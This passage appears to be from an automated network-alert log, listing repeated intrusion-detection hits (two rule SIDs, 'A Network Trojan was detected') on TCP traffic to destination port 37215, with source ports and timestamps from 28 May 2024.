          SID:2835222
          Source Port:57554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847731
          SID:2835222
          Source Port:38040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876306
          SID:2835222
          Source Port:42638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685652
          SID:2835222
          Source Port:36452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713580
          SID:2835222
          Source Port:57964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244710
          SID:2835222
          Source Port:40866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348770
          SID:2835222
          Source Port:33434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551296
          SID:2829579
          Source Port:58792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764452
          SID:2829579
          Source Port:60856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959917
          SID:2829579
          Source Port:54164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216576
          SID:2829579
          Source Port:46390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711213
          SID:2835222
          Source Port:47514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400941
          SID:2829579
          Source Port:37358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651273
          SID:2829579
          Source Port:47286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690017
          SID:2829579
          Source Port:59920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033268
          SID:2835222
          Source Port:40626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466112
          SID:2835222
          Source Port:37356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877966
          SID:2829579
          Source Port:38512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941223
          SID:2835222
          Source Port:36008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464434
          SID:2835222
          Source Port:41668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938619
          SID:2835222
          Source Port:55674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651451
          SID:2835222
          Source Port:53572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922921
          SID:2829579
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810038
          SID:2835222
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187230
          SID:2829579
          Source Port:59060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665601
          SID:2835222
          Source Port:33204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552080
          SID:2829579
          Source Port:52390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821168
          SID:2835222
          Source Port:33134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796225
          SID:2835222
          Source Port:37348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466499
          SID:2829579
          Source Port:52472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710615
          SID:2829579
          Source Port:49318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268626
          SID:2829579
          Source Port:39496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051212
          SID:2829579
          Source Port:49300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605632
          SID:2835222
          Source Port:50150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689733
          SID:2835222
          Source Port:34600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337404
          SID:2829579
          Source Port:33878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847731
          SID:2829579
          Source Port:49870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812848
          SID:2835222
          Source Port:37178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782222
          SID:2829579
          Source Port:33642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.714394
          SID:2829579
          Source Port:47680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847672
          SID:2835222
          Source Port:58712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707733
          SID:2829579
          Source Port:47570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907751
          SID:2835222
          Source Port:50814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178969
          SID:2829579
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797129
          SID:2835222
          Source Port:55740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.773961
          SID:2835222
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848372
          SID:2829579
          Source Port:36778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819336
          SID:2835222
          Source Port:52436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560849
          SID:2835222
          Source Port:33940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160529
          SID:2829579
          Source Port:40228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848445
          SID:2835222
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817610
          SID:2829579
          Source Port:46502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878750
          SID:2829579
          Source Port:34254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780779
          SID:2829579
          Source Port:48972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131676
          SID:2829579
          Source Port:59122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327915
          SID:2829579
          Source Port:53344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594873
          SID:2829579
          Source Port:57650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297541
          SID:2835222
          Source Port:36044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298564
          SID:2835222
          Source Port:44558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892845
          SID:2835222
          Source Port:44514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090334
          SID:2829579
          Source Port:50224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650266
          SID:2829579
          Source Port:58990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983486
          SID:2829579
          Source Port:55518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415975
          SID:2829579
          Source Port:50402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209526
          SID:2835222
          Source Port:48220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242818
          SID:2829579
          Source Port:54790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941029
          SID:2835222
          Source Port:49832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544120
          SID:2835222
          Source Port:37956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941563
          SID:2835222
          Source Port:59962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426617
          SID:2835222
          Source Port:35036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336541
          SID:2835222
          Source Port:48628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141834
          SID:2829579
          Source Port:54728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293910
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336053
          SID:2829579
          Source Port:40536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849234
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739701
          SID:2835222
          Source Port:42900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185779
          SID:2829579
          Source Port:54092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536511
          SID:2829579
          Source Port:59170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112189
          SID:2829579
          Source Port:50662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710499
          SID:2835222
          Source Port:39582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232682
          SID:2829579
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301235
          SID:2829579
          Source Port:44660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756756
          SID:2829579
          Source Port:60810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874105
          SID:2835222
          Source Port:55444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553912
          SID:2829579
          Source Port:55162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220918
          SID:2835222
          Source Port:42768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859163
          SID:2829579
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593363
          SID:2835222
          Source Port:60150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922590
          SID:2835222
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146262
          SID:2835222
          Source Port:59474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215042
          SID:2829579
          Source Port:33826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.130533
          SID:2835222
          Source Port:44768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272341
          SID:2835222
          Source Port:39086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.295014
          SID:2829579
          Source Port:52874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470731
          SID:2835222
          Source Port:35720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655819
          SID:2829579
          Source Port:35236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295361
          SID:2835222
          Source Port:33702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229039
          SID:2829579
          Source Port:47204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553265
          SID:2829579
          Source Port:59014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216388
          SID:2829579
          Source Port:36656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208945
          SID:2835222
          Source Port:33200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325429
          SID:2835222
          Source Port:45074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635885
          SID:2829579
          Source Port:54028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.623958
          SID:2829579
          Source Port:50736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.637148
          SID:2829579
          Source Port:46474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130666
          SID:2835222
          Source Port:59814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941534
          SID:2829579
          Source Port:54018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965029
          SID:2835222
          Source Port:48766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841959
          SID:2835222
          Source Port:37498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664568
          SID:2835222
          Source Port:43956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669461
          SID:2829579
          Source Port:37100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551708
          SID:2829579
          Source Port:38154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842123
          SID:2829579
          Source Port:49226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322090
          SID:2835222
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369163
          SID:2829579
          Source Port:51154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462178
          SID:2835222
          Source Port:42540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838658
          SID:2835222
          Source Port:39416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187427
          SID:2835222
          Source Port:35364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728928
          SID:2835222
          Source Port:36132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270329
          SID:2829579
          Source Port:39498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794755
          SID:2829579
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893547
          SID:2829579
          Source Port:56268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923587
          SID:2829579
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.926913
          SID:2835222
          Source Port:52610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812885
          SID:2835222
          Source Port:48540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760208
          SID:2829579
          Source Port:52836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879424
          SID:2829579
          Source Port:37154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796192
          SID:2835222
          Source Port:39128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977256
          SID:2829579
          Source Port:55338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325836
          SID:2829579
          Source Port:58874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744809
          SID:2829579
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666466
          SID:2835222
          Source Port:55966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358277
          SID:2829579
          Source Port:33044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336966
          SID:2829579
          Source Port:48376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743571
          SID:2829579
          Source Port:32910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287352
          SID:2835222
          Source Port:33642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847471
          SID:2835222
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285240
          SID:2829579
          Source Port:53220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542084
          SID:2835222
          Source Port:54652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949260
          SID:2835222
          Source Port:40616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592011
          SID:2835222
          Source Port:42844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339305
          SID:2835222
          Source Port:36126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552134
          SID:2835222
          Source Port:59136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865000
          SID:2829579
          Source Port:51174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147268
          SID:2829579
          Source Port:39948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322909
          SID:2835222
          Source Port:50568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339722
          SID:2829579
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807931
          SID:2835222
          Source Port:48144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138104
          SID:2835222
          Source Port:35088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211411
          SID:2829579
          Source Port:43900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992354
          SID:2829579
          Source Port:44108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551225
          SID:2835222
          Source Port:33446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977190
          SID:2829579
          Source Port:43722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627114
          SID:2835222
          Source Port:39966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.412129
          SID:2829579
          Source Port:39828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213316
          SID:2835222
          Source Port:59822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949152
          SID:2835222
          Source Port:33890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.996380
          SID:2829579
          Source Port:44480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182350
          SID:2835222
          Source Port:52318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152110
          SID:2829579
          Source Port:35314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.127684
          SID:2829579
          Source Port:50440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.224185
          SID:2835222
          Source Port:58584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325679
          SID:2835222
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551151
          SID:2835222
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841953
          SID:2835222
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064010
          SID:2835222
          Source Port:33178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528916
          SID:2829579
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.115992
          SID:2835222
          Source Port:42684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273501
          SID:2835222
          Source Port:48398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213964
          SID:2829579
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588628
          SID:2835222
          Source Port:50290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743716
          SID:2835222
          Source Port:51712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843272
          SID:2829579
          Source Port:33914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669343
          SID:2835222
          Source Port:42706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243618
          SID:2829579
          Source Port:48076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724881
          SID:2835222
          Source Port:43980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848558
          SID:2829579
          Source Port:34394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878579
          SID:2835222
          Source Port:34242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711458
          SID:2829579
          Source Port:35050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622202
          SID:2829579
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183099
          SID:2835222
          Source Port:58936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609990
          SID:2829579
          Source Port:47600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341964
          SID:2829579
          Source Port:34512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170550
          SID:2835222
          Source Port:54444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473196
          SID:2829579
          Source Port:43644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810451
          SID:2835222
          Source Port:33442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204838
          SID:2835222
          Source Port:44714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462875
          SID:2835222
          Source Port:52474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.731953
          SID:2829579
          Source Port:33502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871204
          SID:2829579
          Source Port:49800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729534
          SID:2835222
          Source Port:36532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414798
          SID:2829579
          Source Port:38044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695827
          SID:2829579
          Source Port:47414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.714537
          SID:2835222
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297700
          SID:2829579
          Source Port:47144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.085475
          SID:2829579
          Source Port:52330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711482
          SID:2829579
          Source Port:45584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124451
          SID:2835222
          Source Port:59592
          Destination Port:37215
